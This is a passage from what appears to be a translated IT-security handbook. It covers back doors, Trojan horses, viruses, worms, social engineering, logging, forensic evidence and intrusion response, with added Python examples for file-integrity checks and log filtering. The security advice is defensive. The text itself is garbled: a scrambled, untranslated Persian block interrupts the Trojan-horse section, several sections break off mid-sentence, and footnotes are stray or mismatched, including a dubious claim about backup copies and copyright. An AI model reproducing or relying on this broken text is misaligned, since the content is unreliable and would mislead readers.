Protecting against back doors is very difficult. The best defence is to check the integrity and correctness of important files regularly. Besides checking files, you should search your system for privileged files and open TCP/IP ports, and periodically check the permissions and ownership of important files and directories as well. Unfortunately, it is now easy to hide the signs and behaviour of malicious software with great subtlety. As a result, if you allow your system to be tampered with, you may never be able to notice the changes that have been made.
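The checks recommended above (integrity of important files, privileged files, permissions and ownership) can be combined in one baseline comparison. The following is an added example and not the handbook's own tool: it records a SHA-256 digest, the permission bits and the owner of every regular file under a directory and reports what differs on a later run. The function names and finding labels are this example's own.

```python
import hashlib
import os
import stat

PRIVILEGED = stat.S_ISUID | stat.S_ISGID   # set-user-ID and set-group-ID bits


def snapshot(root):
    """Record digest, permission bits, owner and group of each regular file under root."""
    state = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            info = os.lstat(path)               # do not follow symbolic links
            if not stat.S_ISREG(info.st_mode):
                continue
            digest = hashlib.sha256()
            with open(path, "rb") as handle:
                for chunk in iter(lambda: handle.read(65536), b""):
                    digest.update(chunk)
            state[os.path.relpath(path, root)] = {
                "sha256": digest.hexdigest(),
                "mode": stat.S_IMODE(info.st_mode),
                "uid": info.st_uid,
                "gid": info.st_gid,
            }
    return state


def compare(baseline, current):
    """Return sorted (path, finding) pairs describing how current differs from baseline."""
    findings = []
    for path in sorted(set(baseline) | set(current)):
        old, new = baseline.get(path), current.get(path)
        if new is None:
            findings.append((path, "removed"))
            continue
        if old is None:
            findings.append((path, "added"))
            old = dict(new, mode=0)   # so privilege bits on a new file are still reported
        if old["sha256"] != new["sha256"]:
            findings.append((path, "content-changed"))
        gained = new["mode"] & ~old["mode"]
        if gained & PRIVILEGED:
            findings.append((path, "gained-setuid-or-setgid"))
        if gained & stat.S_IWOTH:
            findings.append((path, "became-world-writable"))
        if (old["uid"], old["gid"]) != (new["uid"], new["gid"]):
            findings.append((path, "owner-changed"))
    return findings


def privileged_files(state):
    """Paths that currently carry a set-user-ID or set-group-ID bit."""
    return sorted(path for path, meta in state.items() if meta["mode"] & PRIVILEGED)


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path in privileged_files(snapshot(root)):
        print("privileged:", path)
```

The baseline is only useful if it is kept where a tampered system cannot rewrite it, for example on read-only or offline media.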
... is used. A time-out means that after a specified period of time, if a particular action such as paying a licence fee has not been carried out, the program will no longer run. Time-outs are usually built into software that is at the final testing stage before distribution to the consumer market, so that users will upgrade their trial software to newer versions or buy an official copy.
Protection against malicious logic bombs is similar to protection against back doors: do not install software without reading it and testing it thoroughly. Make backups regularly so that you can restore your data if anything untoward happens.
ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ
ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍﻱ ﺩﻧﻴﺎﻱ ﻣﺪﺭﻥ -ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺯ ﻧﺎﻣﺸﺎﻥ ﭘﻴﺪﺍﺳﺖ -ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﺷﺒﻴﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﺪ؛ ﻣﺜﻞ ﻳﻚ ﭘﺮﺩﺍﺯﺓ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ،ﻳﻚ ﺑﺎﺯﻱ ،ﻳﺎ ﻳﻚ ﻭﻳﺮﺍﻳﺸﮕﺮ .ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺑﺮﻧﺎﻣـﻪ ﺩﺭ ﻇـﺎﻫﺮ ﻛـﺎﺭ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺍﻧﺠـﺎﻡ
ﻼ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮ ﮔﻤﺎﻥ ﻛﻨﺪ ﻛﻪ ﻳـﻚ ﺑـﺎﺯﻱ ﻣﻲﺩﻫﺪ ،ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﻛﺎﺭﺑﺮ ﺑﻪ ﻛﺎﺭ ﺩﻳﮕﺮﻱ ﺑﺮﺧﻼﻑ ﻫﺪﻑ ﺍﻋﻼﻡﺷﺪﻩ ﻧﻴﺰ ﻣﻲﭘﺮﺩﺍﺯﺩ .ﻣﺜ ﹰ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٢٠
ﺍﺟﺮﺍ ﻛﺮﺩﻩ ﺍﺳﺖ ﻭ ﺑﺮﻧﺎﻣﻪ ﻧﻴﺰ ﺳﺆﺍﻻﺗﻲ ﻣﺎﻧﻨﺪ "ﺩﻭﺳﺖ ﺩﺍﺭﻳﺪ ﭼﻪ ﻧﺎﻣﻲ ﺭﻭﻱ ﺑﺎﺯﻳﻜﻦ ﺑﮕﺬﺍﺭﻳﺪ؟" ﻳﺎ "ﺩﺭ ﭼﻪ ﺳـﻄﺤﻲ ﺍﺯ ﺳـﺨﺘﻲ ﻣـﻲﺧﻮﺍﻫﻴـﺪ
ﻼ ﺩﺭﺣﺎﻝ ﭘﺎﻙﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎ ﻭ ﻗﺎﻟﺐﺑﻨﺪﻱ ﻣﺠﺪﺩ ﻳﻚ ﺩﻳﺴﻚ ﺑﺎﺷﺪ ،ﻭ ﻳﺎ ﺍﺳﻨﺎﺩ ﻣﺤﺮﻣﺎﻧﻪﺍﻱ ﺭﺍ ﺑـﻪ ﻳـﻚ ﺑﺎﺯﻱ ﻛﻨﻴﺪ؟" ﺍﺯ ﻭﻱ ﺑﭙﺮﺳﺪ ،ﺍﻣﺎ ﻋﻤ ﹰ
ﻻ ﺑـﺎ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭ ﺁﻧﺴﻮﻱ ﺩﻧﻴﺎ ﺑﻔﺮﺳﺘﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺩﺭ ﺑﻌﻀﻲ ﻣﺤﻴﻄﻬﺎ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨـﺮﺏ ﻣﻌﻤـﻮ ﹰ
ﺣﻘﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﺑﻌﻨﻮﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺷﺪﻩ ﻣﻴﺎﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﺗﻮﺯﻳـﻊ
ﻣﻲﮔﺮﺩﻧﺪ.
Trojan horses have also been found in programs and installation scripts. Some shell files (especially shar files), VBS files, awk files, perl files, sed scripts, TeX files, PostScript files, MIME-encoded mail, and web pages can all contain commands that cause unwanted problems. Even text files can be dangerous. Some editors allow commands that automatically initialize the editor to be embedded in the first or last few lines of a file. (To find out how to disable this feature, consult the documentation of the editor you use.)
If you are running a script for the first time or unpacking files, it is better to do so on a separate, quarantined machine or in a restricted environment, so that the software package is denied access to files and directories outside its own work area (on Unix this can be done with the chroot() system call).
Another form of Trojan horse can work by exploiting the block-send command[327] or answerback modes[328] of serial terminals built in the 1970s and 1980s (which are emulated by many terminal emulator programs, including Microsoft's HyperTerminal). Many kinds of terminal have settings under which a particular string of control characters can cause a command to be executed remotely, as if that command had been typed at the keyboard. A command embedded in an e-mail message may therefore cause the terminal to send a "delete all files and log out" command to the operating system, and then send a "clear screen" sequence to the terminal itself. Disable this feature in your terminal or emulator program.
Viruses
A true virus is a program that attaches itself to other executable programs. As a result, whenever the ordinary program is run, the virus program runs too. The virus program causes a copy of itself to be added to one or more other programs. Viruses cannot be standalone programs; that is, they cannot run on their own, but need a host so that they can run as part of it.
Almost all viruses target personal computers running popular operating systems (such as MS DOS, Microsoft Windows, and Apple MacOS). Viruses can spread on operating systems that have few security mechanisms (such as DOS and MacOS versions before version 10) as well as on those that have advanced security mechanisms (such as Windows NT and Windows XP). Viruses have been written for Unix systems too. There are even viruses that can infect both Windows systems and Unix-based systems. Viruses that infect the boot sector, if they manage to infect a boot diskette, can infect BSD- or Linux-based systems as easily as Windows systems (although the infection cannot spread any further than that).
Viruses are a powerful tool for attackers. Although anything a virus does can also be done by other means, viruses can spread without the attacker's intervention or direction, and can even reach places that the attacker personally cannot access.
To protect against viruses you can use the same techniques used against back doors and crackers. On Intel systems you should not boot the system from untrusted disks. Antivirus software is now considered a basic requirement for home and business computers, yet the number of computers without antivirus software is greater than the number equipped with it. An equally worrying problem is that many of those who do obtain antivirus software do not update its virus signatures from time to time, and in practice reduce the effectiveness of their software against new threats to a minimum.
Worms
Worms are programs that can run independently and travel from one computer to another over network connections; different parts of a worm may even run on different computers. Worms do not modify other programs, although they may carry a program that does (such as a virus). Hundreds of network worms have appeared for various operating systems. Arguably the most common worms spread by e-mail. These worms usually obtain other people's e-mail addresses from the address book of the infected system and send themselves to those addresses as an important message from the owner of the infected system (or even from other people whose names appear in that owner's address book).
Protection against worms requires the same techniques as protection against intrusion. If an attacker can get into your machine, so can a worm. If your computer is secure against unauthorized access, it will naturally be secure against worms as well. All the recommendations given for preventing unauthorized access apply here too.
If you suspect that you have been attacked by a network worm, contact computer incident response centers[329] and find out whether others have made similar reports. If an incident has occurred, you may obtain useful information this way for protecting or recovering your system. Disconnect your network's Internet connection so that your local network is isolated. If a worm really has penetrated your systems, doing this helps prevent it from spreading and also stops important information from being sent outside your local network. If you have implemented backups and other security measures well, the damage done to
Blended Threats
Most of the new programmed threats, and the most dangerous of them, are "blended threats". A blended threat is a programmed attack that combines the characteristics of several different types of attack and spreads in several different ways. A blended threat may be a network worm that spreads by e-mail, sending copies of itself to the addresses in the infected computer's address book, or by file sharing with other connected systems. After infecting a system, it creates a back door for re-entering it, a zombie for launching a future distributed denial-of-service attack, and a logic bomb for carrying out timed destruction. Defending against blended threats is similar to defending against single threats, except that all aspects must be considered together: the best way to counter them is a layered defense system.
Social Engineering
On many computer systems it is possible, by exploiting certain bugs and vulnerabilities, to raise an ordinary user's privileges to those of the superuser or system administrator. Consequently, on many systems a skilled attacker can steal an ordinary username and password and then use this method to gain full control of the system.
One of the most common ways of obtaining a username and password is the use of "social engineering" techniques. Social engineering is one of the simplest and most effective tools for gaining unauthorized access to computer systems. To carry out a social engineering attack, the attacker usually telephones the target organization and tries, by building social rapport, to obtain information about the organization. For example, the attacker may pretend to be a new user who has forgotten his password and ask for it to be changed. Or he may pretend to be a service representative who needs to change the system administrator's password in order to provide support. Social engineering attacks are usually effective because people in general want to help solve problems. In fact, being on the receiving end of these attacks can be regarded as the computer equivalent of confidence games.
Social engineering can be automated. There are many so-called "phishing" programs that send an e-mail based on one of the social engineering techniques to thousands or tens of thousands of users at once. Some of them ask for a username and password, and others ask for valid credit card numbers.
The most effective countermeasure against social engineering is an intensive and serious training program for users. Users must be taught (and periodically reminded) never to give security information to anyone they do not know to be an authorized member of the organization's security staff, and even then to give the information only to that person directly. Users should be told that no member of the security staff will ever ask them to reveal a password, a credit card number, or any other secret element used for authentication; and users who receive such messages must report them promptly to the people responsible.
Part Five: IT Security and Technical Administrators
Chapter Nine
Intrusion Detection and Management
Overview
Despite your best efforts, your system may be compromised. In this chapter we discuss measures such as auditing, logging, and forensics for discovering compromises and detecting changes, and we show you step by step how to regain control of your computer.
Each of these methods has advantages and disadvantages. Within each of them there are many ways to examine a system that is suspected of having been compromised:
• Physically remove the hard disk from the computer in question, attach the disk to another computer as an auxiliary disk, boot the second computer, mount the disk read-only, and then use the second computer's operating system to examine the disk (or make an exact second copy of the disk and examine that).
• Leave the suspect disk in the suspect computer, but boot the suspect computer with a trusted operating system from a CD or floppy disk. Then, using only the tools on the CD or floppy disk, you can mount the suspect disk read-only and analyze its possibly compromised file system.
• Log in to the suspect computer and run whatever integrity-checking tools were installed on it.
[330] Metadata
Clearly the most thorough way to examine a suspect system is the first method. The third method is the most common approach but in practice is inadequate, because if an attacker really has compromised your computer, nothing on it can be trusted, and that includes the integrity-checking software and its databases.
Local Copies
A standard method of keeping comparison copies is to put them on another disk, especially on removable media. Many people have reported that by storing critical system files on removable media they have been able to maintain the integrity of those files.[332] If there is any doubt about a particular file, the relevant disk is placed in the drive and mounted, and the comparison is carried out. If you take sufficient care in configuring these disks, you gain the valuable benefit that, if your system is damaged by an attack or by accident, you have a complete copy of your system to boot from. Regular backups on removable or write-once media such as tapes and CDs offer the same benefits.
Another method of storing secondary copies is to make copies of the files in another part of the disk. You can compress and/or encrypt this copy to reduce the disk space used and to protect it against snooping as well. The drawback of compression and encryption is that the comparison requires extra processing. If you want to perform this comparison once a day (or more often), the extra activity may have considerable side effects. In addition, you cannot protect the encryption program itself by this method.
[331] Copyright laws, and many licenses, do not permit you to make copies for backup purposes.
[332] Note that this description refers to an external firewire-based disk.
put on a secure server, and share that partition read-only using NFS or a similar protocol. All clients can then mount that partition and use the master copies to test the integrity of their local copies. You must of course be sure that all the master data used in the comparison is taken from the remote computer and not from the local disk. Otherwise an attacker can alter those files in such a way that no change is reported.
Another way of performing a remote comparison over the network is to use "rdist". Remember that keeping copies of executable files alone is not enough; shared libraries and configuration files must also be compared with their master copies.
Checksums and Signatures
Unfortunately, simple checklists can be defeated with a little effort. Files can be altered in such a way that the changes are not detected by the information you store. For example, someone who knows which block to change can modify a file by writing directly to the disk, independently of the file system. Because the change was not made through the file system, none of the information about the file's modification time changes. As another example, an attacker can set the system clock to the last time at which legitimate changes were allowed, modify the file, and then set the system clock back to the original time.
To counter these threats, signatures can be generated for files and then compared with one another. A good signature must depend on every single bit of the file, and an attacker must not be able to produce another file with the same signature. These requirements rule out simple checksum algorithms (such as CRC), but they can be met by cryptographic digests. Good file integrity checkers can usually produce several kinds of cryptographic digest for each file and its metadata. When a clean copy is used to generate the signatures and the signatures are kept in a safe place (for example on removable or write-once media), any change to the files can easily be detected by generating the signatures again and comparing them with the signatures of that clean copy. One multi-platform software package for doing this is Tripwire (http://www.tripwire.com), of which a free, open-source version is available for Linux.
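The point made above, that a checklist of sizes and timestamps can be fooled while a cryptographic digest cannot, can be tried out directly. The following Python sketch is an added example, not part of the original handbook and not Tripwire's code; the file names and contents are constructed, and SHA-256 is an assumed choice of digest.

```python
import hashlib
import os
import tempfile


def file_digest(path, algorithm="sha256", chunk_size=65536):
    """Return the hex cryptographic digest of a file's contents."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Record size, mtime, mode and SHA-256 for every regular file under root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            baseline[os.path.relpath(path, root)] = {
                "size": st.st_size,
                "mtime_ns": st.st_mtime_ns,
                "mode": st.st_mode,
                "sha256": file_digest(path),
            }
    return baseline


def compare(old, new, fields):
    """Return {path: reason} for files added, removed, or differing in `fields`."""
    report = {}
    for rel in sorted(set(old) | set(new)):
        if rel not in new:
            report[rel] = "removed"
        elif rel not in old:
            report[rel] = "added"
        else:
            changed = [f for f in fields if old[rel][f] != new[rel][f]]
            if changed:
                report[rel] = "changed: " + ",".join(changed)
    return report


METADATA_ONLY = ("size", "mtime_ns", "mode")   # the "simple checklist"
WITH_DIGEST = METADATA_ONLY + ("sha256",)      # checklist plus cryptographic digest


def demo():
    """Alter a file while keeping its size and timestamps, then run both comparisons."""
    with tempfile.TemporaryDirectory() as root:
        target = os.path.join(root, "login")          # constructed file names
        with open(target, "wb") as fh:
            fh.write(b"original program bytes\n")
        with open(os.path.join(root, "ls"), "wb") as fh:
            fh.write(b"another program\n")
        before = snapshot(root)   # in practice, kept on read-only or removable media

        st = os.stat(target)
        with open(target, "wb") as fh:
            fh.write(b"tampered program bytes\n")      # same length as the original
        # Put the old timestamps back, standing in for the clock trick in the text.
        os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))

        after = snapshot(root)
        return (compare(before, after, METADATA_ONLY),
                compare(before, after, WITH_DIGEST))


if __name__ == "__main__":
    metadata_report, digest_report = demo()
    print("metadata-only checklist:", metadata_report)
    print("with SHA-256 digest:    ", digest_report)
```

The baseline itself has to live where the suspect system cannot rewrite it, as the text says; a digest stored next to the file it protects proves nothing.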
Log Files
A log file is a file in which the occurrence of events is recorded. Loggable events, or log events,[335] are specific activities or conditions that the author of a program considers worth recording. Log files are an important building block of a secure system: with them you have a stored history and an audit trail of your computer's past that makes it possible to trace problems and attacks. Using log files you can piece together items of information and discover the cause of a bug, the source of an intrusion, or the extent of the damage done. In cases where you cannot prevent the damage, you will at least have a record of it. Those logs may be exactly what you need to rebuild your system, conduct an investigation, testify in court, or recover the cost of the damage from an insurance company.
Logs can be stored in a number of different places:
• Logs can be stored on the same computer on which the event occurred. On modern Unix systems, for example, logs are stored in the /var/log directory, although some programs use other directories in particular circumstances. Windows NT-based systems collect operating system and application messages and store them in a single log file (usually the file C:\WINNT\system32\config\SysEvent.Evt); on these platforms, too, individual programs may have log files of their own.
• Logs can be sent over the network to a remote computer so that they are all stored together in one place. This remote computer, sometimes called a log server,[336] can serve as a central location for monitoring a large number of computers on a network. A log server can be configured, by means of a host-based firewall, so that it receives log information from other computers but cannot send any packets onto the network. Using a log server helps prevent an attacker from erasing the log files. A centralized remote logging system is also an ideal place to run intrusion detection software over the collected logs.
• Logs can be written to write-once media or printed. Naturally, logs of this kind cannot be destroyed without physical access, although storing them in large volumes can be troublesome.
Some information should never be logged, for security reasons. For example, although failed attempts to enter a password should be logged, the password used in those attempts should never be logged. Users frequently mistype their passwords, and logging these mistakes can help attackers find the correct password and so break into the person's account. Some system administrators even believe that the username should not be logged for failed login attempts either, especially if the account whose name the user entered does not exist; their reason is that users sometimes enter their password in place of their username.
user: "jhalonen")
This message was generated by the postfix program. It reports that an e-mail message with ID 80AD8E44308 was received for the user jhalonen@ex.com, and says that the message was suspended because the user jhalonen@ex.com did not exist. The "facility" of this event is "mail" and its severity is "informational" (info).[337]
[337] For a more detailed discussion of the configuration, priorities, and facilities of logging on Unix, see pages 642 to 654 of the PUIS book.
Some analysis software, such as Microsoft Event Viewer, lets you choose the filters and factors you are interested in. Others, such as Swatch on Unix servers, monitor the logs in real time and raise an alert whenever something important happens.[338]
Handwritten Logs
Another kind of log that helps you maintain security is not produced by the computer, but by you and your staff. Keep a logbook and record your daily activities in it. Logbooks should be kept on paper and stored in a place that is physically secure. Because you keep them on paper, someone who breaks into your computer, even with superuser privileges, cannot alter them. These logs are an archive of important information that cannot be tampered with electronically.
Handwritten logs have several advantages over computer logs. Here you can record things that computers cannot, such as bomb threats. You can also read paper logs even when the system is switched off. Under the laws of some countries, paper logs are considered more credible evidence than computer logs.
The biggest problem with logbooks is the large amount of time needed to keep them up to date, since the logging can no longer be handed over to an automated script. Unfortunately this time burden is the main reason why system administrators are reluctant to use logs of this kind consistently (especially in offices with hundreds or thousands of computers, each of which needs a logbook of its own). Rather than trying in vain to keep several logbooks up to date, it is suggested that you try, with a little creativity, to find a way of reducing the volume of the logs without reducing their value. Two ways of cutting down on excess logging are "compressing the log information" and "keeping a group log for a set of computers"; if done properly, neither takes anything away from the value of the logs.
There are basically two kinds of logbook: per-site logs and per-machine logs. In per-site logbooks you keep information that is useful for all of your computers and operations. This information can be divided into reports of events and exceptional events (power outages, the activation and testing of alarms, personnel actions involving employees with special privileges) and informational material (contact information, hardware and software receipts, serial numbers of equipment, MAC addresses of Ethernet-equipped machines, copies of router configurations, and so on). You should also have a dedicated logbook for each machine, and in it record reports of exceptional events such as system crashes, periods when the computer was down, the creation and deletion of user accounts, password changes, software installation, and system backups. The informational material can include copies of configuration files, a list of the patches applied, and the configuration of the disks.
Backups
Make sure that all log files are transferred to backup media regularly, preferably every day. The backup schedule should be arranged so that files that are purged periodically are transferred to backup before they are purged. This ensures that, over time, you have a record of the behavior of your system and of the accesses made to it.
Review
Review the log files at least once a day. If you do not review the logs regularly, keeping them does not help you. With the help of log files you can find hardware problems, network configuration problems, and your security shortcomings.
Processing
Summarize your log files using analysis software. Many logged reports contain nothing noteworthy. Seeing them may become so routine that, out of habit, you only glance at the reports to see whether there is a problem, and so it is very likely that you will miss an important message.
You must be careful when summarizing. You should not summarize the logs with something that selects the important items you want to see and throws the rest away. In such a system it is very likely that an important message will be discarded before it is read. Instead, the software should filter out the tedious messages as far as possible, with careful pattern matching, and hand the rest to you for examination. From time to time you should also read the messages that were not selected, to make sure that the filtering mechanism is not causing you to miss something important.
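One way to implement the filtering approach described above (added example, not from the original handbook): discard only lines that match narrow, whole-line patterns for known routine messages, pass everything else on for review, and keep counts and a sample of what was discarded so that it can be audited. The log lines, host names, addresses and rule names are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample lines in classic syslog format (not taken from the handbook).
SAMPLE_LOG = """\
Jul  4 03:10:01 web1 CRON[4120]: (root) CMD (/usr/sbin/logrotate /etc/logrotate.conf)
Jul  4 03:11:27 web1 sshd[4188]: Accepted publickey for backup from 192.0.2.10 port 50122 ssh2
Jul  4 03:12:02 web1 sshd[4201]: Failed password for invalid user admin from 203.0.113.77 port 40022 ssh2
Jul  4 03:12:09 web1 sshd[4203]: Accepted password for root from 203.0.113.77 port 40031 ssh2
Jul  4 03:12:40 web1 postfix/smtpd[4210]: connect from mail.example.net[198.51.100.5]
Jul  4 03:13:05 web1 kernel: device eth0 entered promiscuous mode
Jul  4 03:15:01 web1 CRON[4290]: (root) CMD (/usr/sbin/logrotate /etc/logrotate.conf)
""".splitlines()

# Timestamp and host name that open every syslog line.
PREFIX = r"^\w{3} [ \d]\d \d\d:\d\d:\d\d \S+ "

# Routine messages, matched as narrowly as possible: the whole line, a known
# command, a known account, a known source address.
ROUTINE = {
    "logrotate cron": PREFIX
    + r"CRON\[\d+\]: \(root\) CMD \(/usr/sbin/logrotate /etc/logrotate\.conf\)$",
    "backup login": PREFIX
    + r"sshd\[\d+\]: Accepted publickey for backup from 192\.0\.2\.10 port \d+ ssh2$",
    "smtp connect": PREFIX + r"postfix/smtpd\[\d+\]: connect from \S+\[[\d.]+\]$",
}

# A careless rule set for comparison: "any successful ssh login is boring".
CARELESS = dict(ROUTINE, **{"any ssh login": PREFIX + r"sshd\[\d+\]: Accepted .*$"})


def triage(lines, rules):
    """Split lines into those needing review and those suppressed as routine.

    Returns (review, suppressed_counts, audit_sample). Anything that matches
    no rule goes to review, so an unknown message is never silently dropped.
    """
    compiled = [(name, re.compile(rx)) for name, rx in rules.items()]
    review, suppressed, audit_sample = [], Counter(), {}
    for line in lines:
        for name, rx in compiled:
            if rx.match(line):
                suppressed[name] += 1
                audit_sample.setdefault(name, line)  # kept for periodic re-reading
                break
        else:
            review.append(line)
    return review, suppressed, audit_sample


def hidden_by(lines, strict_rules, loose_rules):
    """Lines the strict rules send to review but the loose rules would hide."""
    strict_review, _, _ = triage(lines, strict_rules)
    loose_review, _, _ = triage(lines, loose_rules)
    return [line for line in strict_review if line not in loose_review]


if __name__ == "__main__":
    review, suppressed, sample = triage(SAMPLE_LOG, ROUTINE)
    print("For review:")
    for line in review:
        print("  " + line)
    print("Suppressed:", dict(suppressed))
    print("Hidden by the careless rule:", hidden_by(SAMPLE_LOG, ROUTINE, CARELESS))
```

Reading `audit_sample` and the counts from time to time is the periodic check of discarded messages that the text asks for.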
Trust
Do not trust logs absolutely. Attackers who obtain superuser privileges can usually alter or delete logs. Local users with physical access or sufficient knowledge of the system can also tamper with the logging mechanism, or bypass it, in order to mislead you; and of course software or system errors may also result in logs not being collected and stored correctly. You therefore need to use additional logging and scanning mechanisms: the fact that something was not logged is no proof that it did not happen. Equally, the fact that something was logged does not necessarily mean that it happened; an attacker may plant an entry in the logs to divert you from the real problem or to cast suspicion on someone else.
Collecting Evidence
Most of the information in the various log files is there deliberately, by the decision of a designer or programmer, but a running system records other information as well. In recent years there has been great interest in computer forensics, the art of reading and using the traces that an attacker leaves behind in computer systems.
Although it may not seem obvious at first, when something bad happens to the system there are some files that, if they have been kept separately for each user, are of greater help in the analysis. These files are not really log files, but they are a useful source of information about user behavior.
E-mail
Some users' accounts are configured to keep a copy of all mail sent in a file. If an attacker sends mail from such an account, examining a copy of the mail he sent can give you useful information. In at least one reported case, a person who was stealing confidential information using a colleague's stolen password was caught because the investigation showed that he had been signing the mail he sent with his own name!
Network Settings
Each user's account can have several network configuration files, which can be used to create shortcuts[341] for issuing commands or applying access rights. Sometimes the information in these files can provide a clue for tracing a criminal's activities. Examples of these files on Unix are .rhosts, .ssh/known_hosts, and .ssh/authorized_keys for remote login, and the .netrc file for FTP. Look for clues in these files, but remember that the information in them may date from before the attack, or may have been put there to mislead you.
Handling an Intrusion
You should have a plan for dealing with security breaches. In general, every organization that has particular concerns about its security should have such a plan. The main components of this plan are:
Component 4: Confirm your diagnosis and determine the damage
After containing the damage, confirm your diagnosis of the problem and determine the damage that has been done. Are files still being deleted after the employee has been dismissed? You can never be one hundred percent sure that two or more events are related to one another. In addition, you may not be able to determine all of the damage immediately.
If you intend to pursue the incident legally, or are seeking legal redress for the damage it caused, you must try to gather the necessary evidence before doing anything else. Failure to gather evidence should not stop you from contacting the police and filing a case against a suspect, but a lack of evidence may considerably lower your chances of success. Note that preserving evidence can be time-consuming and difficult, and for this simple reason many organizations neglect this component when they run into problems.
In addition to an operational plan, you can increase your preparedness by having a toolkit on read-only media (such as a floppy disk, a CD, and so on). This toolkit gives you a set of untampered programs for responding to an incident, so you can put on it the programs you need to examine a compromised system. For a Unix system, these programs may include the following:
awk, bash, cat, compress, cut, dd, des, df, du, file, find, grep, gzip, icat, ifconfig, last, ls, lsmod,
lsof, md5sum, modinfo, more, netcat, netstat, nmap, paste, pcat, perl, pgp, pkginfo, ps, rpm, rm,
script, sed, strings, strace, tar, top, truss, uncompress, vi, and w.
Do not forget the shared libraries (or link the programs statically). Having a bootable operating system on that CD is also useful. For example, Knoppix (http://www.knoppix.org) is a handy Linux-based toolkit that also comes with a large number of analysis and forensics tools. Because Linux can mount Microsoft's FAT file system and the file systems of other Unix systems, a Knoppix CD is a very useful toolkit.
Discovering an Intrusion
There are several ways in which you may learn of an intrusion:
• You catch the perpetrator in the act. For example, you may see that the superuser has logged in from an Internet café in Budapest, while you are the only person who is supposed to know the superuser password;
• You deduce from information you receive, or from changes that have occurred on the system, that an intrusion has taken place. For example, you receive an e-mail in which the attacker taunts you about the existence of a security hole, or you come across new user accounts;
• You receive a message from the administrator of another network saying that there are signs on his network of unusual activity originating from a computer on your network;
• You see unusual things happening on the system, such as severe network slowness, sudden crashes, heavy hard disk activity, reboots for no convincing reason, minor discrepancies in the accounting of users' connection times, responses with long delays, and so on.
There are various programs that can check files and processes in order to detect intrusions. Run these programs regularly at intervals, and also outside the normal routine. In this way you introduce a random element that prevents attackers from using your schedule to cover their tracks. This simple point is a principle of security practice: always try to be unpredictable.
is connected, another computer can receive and examine all of the packets without causing any disturbance.
If the attacker has come in through a modem or serial port connected directly to the computer, there are several other programs for monitoring him, such as ttywatch, conserver, rtty, and ser2net. These programs give you, exactly and byte by byte, the information sent over one or more serial ports, and in many cases they can even monitor pseudo-ttys. This capability is valuable when the attacker has connected to your server over the network using an encrypted protocol such as SSH.
In some countries monitoring attackers may be illegal, or may be legal only if you have explicitly told users, in messages from your company, that they may be monitored.
4. You can try to trace the connections and identify the attacker. If the attacker has reached you by telephone, this is a matter for the services of the telephone company you have a contract with; some telephone companies provide the caller's identity or a trace of the call. If the attacker is connected over the network, the who or netstat command can quickly identify the computer from which the connection originates. You can then contact the administrator of that computer for further tracing (by telephone, of course!); contact information for system administrators is usually found in the whois information for the domain name or on the organization's web site. Another option is to use a route-tracing program (depending on your operating system, the program may be called traceroute or tracert). If all of these fail, you can send an e-mail message to the root or postmaster user on the originating computer and ask them to contact you. Do not mention the intrusion in this e-mail, because the attacker may be watching those accounts as well.
5. Disconnect the attacker by killing the process, disconnecting the modem or the network, or shutting down the computer. Cutting the power to the computer is the fastest way to throw an attacker out and prevent any further action, including further damage; but it is a very drastic step, because as well as stopping the attacker it interrupts the work of all legitimate users. It may also destroy evidence that you will one day need in court (such as running processes), and, because of Trojans that the attacker has placed in the startup scripts, cause damage to the system when it is rebooted. Furthermore, many file systems may not tolerate a sudden loss of power, so pulling the plug may do more damage than the attacker could have done to them.
On Unix systems you can use the ps command to find the list of the attacker's processes and, after you have identified the account he is using and changed its password, terminate those processes with the kill command. On Windows systems, Task Manager does the same job.
If the attacker is connected over the network, you can cut his connection by programming your firewall to drop the packets coming from his host, or by pulling the network cable altogether. If the attacker has dialed your number over telephone lines, you can switch off the modem or pull its cable out of the back of the computer.
6. Contact your ISP, an incident response team, or a law enforcement official and inform them that the attack has taken place.
After the Attack
The rest of this chapter is devoted to how the things the attacker did should be repaired and cleaned up.
Preserving Evidence
